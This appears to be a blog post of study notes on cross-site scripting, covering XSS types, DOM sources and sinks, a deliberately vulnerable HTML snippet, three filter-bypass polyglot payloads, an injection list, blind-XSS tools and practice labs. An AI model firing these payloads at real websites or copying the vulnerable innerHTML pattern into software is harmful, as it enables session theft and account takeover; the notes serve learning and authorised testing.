XSS

XSS

Posted by D on January 9, 2020

XSS

Crose-site Scripting(XSS). XSS Introduce

Reflective XSS

Stored XSS

example1: Myspace Worm - Stored XSS

example2: Tweetdeck Worm - Stored XSS

DOM XSS

DOM XSS - What to Look For?
Sources Sinks
document.url element.innerHTML()
document.referrer element.outerHTML()
location eval()
location.href setTimeout()
location.search setInterval()
location.hash document.write()
location.pathname document.writeIn()
DOM XSS -What does it look like?
<!DOCTYPE html>
<html>
	<body>
		<script>
			var source = "Hello " + decodeURIComponent(location.hash.split("#")[1]); //Source
			var divElement = document.createElement("div");
			divElement.innerHTML = source; //Sink
			document.body.appendChild(divElement);
		</script>
	</body>
</html>

GET www.vulnerable-website.example#<img src="test" onerror="alert('XSS')">
XSS Polyglot #1(RSnake)
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,
83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar
Code(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(
88,83,83))</SCRIPT>

Multi-context, filter bypass based polyglot payload #1 (OWASP XSS Cheat Sheet)

XSS Polyglot #2 (0xsobky)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/
--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

XSS Polyglot #3 (Ashar Javed)
'">><marquee><img src=x
onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse
over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/)
type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&
lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img
src="http://i.imgur.com/P8mL8.jpg">

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

Blind XSS

Blind XSS frameworks(on github)

  • sleepy-puppy (python)
  • xsshunter (python)
  • ground-control (ruby)(small)

Flash-based XSS

Self XSS

Best Practices

  • start slow
  • Don’t get discouraged!
  • Keep a list of common payloads
  • Use Burp Intruder

Injections list

"
">
"><>
"><script>
"></script>
"><script>alert(1)</script>
"><script>confirm(1)</script>
...

Tools

Tooling
  • Blind
    • XSSTrike
    • XSS Hunter
    • Sleepy Puppy
    • KnoXSS

XSSTrike

XSSHunter (Blind)

Payload:

  • The vulnerable page’s URI
  • Origin of Execution
  • The Victim’s IP Address
  • The Page Referer
  • The Victim’s User Agent
  • All Non-HTTP-Only Cookies
  • The Page’s Full HTML DOM
  • Full Screenshot of the Affected Page
  • Responsible HTTP Request(If an XSS Hunter compatible tool is used)

Labs

bWapp

bWapp Section - A3 - Cross-Site Scripting (XSS)

Cross-Site Scripting - Reflected (GET)
Cross-Site Scripting - Reflected (POST)
Cross-Site Scripting - Reflected (JSON)
Cross-Site Scripting - Reflected (AJAX/JSON)
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)
Cross-Site Scripting - Reflected (HREF)
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)

Additional Labs PentesterLab Pentesterlab

  • XSS and MYSQL FILE
  • Web for Pentester
  • Web for Pentester II
:
CATALOG
    FEATURED TAGS
    shadowsocks v2ray Broken Access Control XSS Recon linux_basic SecTools git Freedom psychology health web hacking food FastDFS nginx MySQL FreeBSD NTP authentication freebsd acme.sh let's encrypt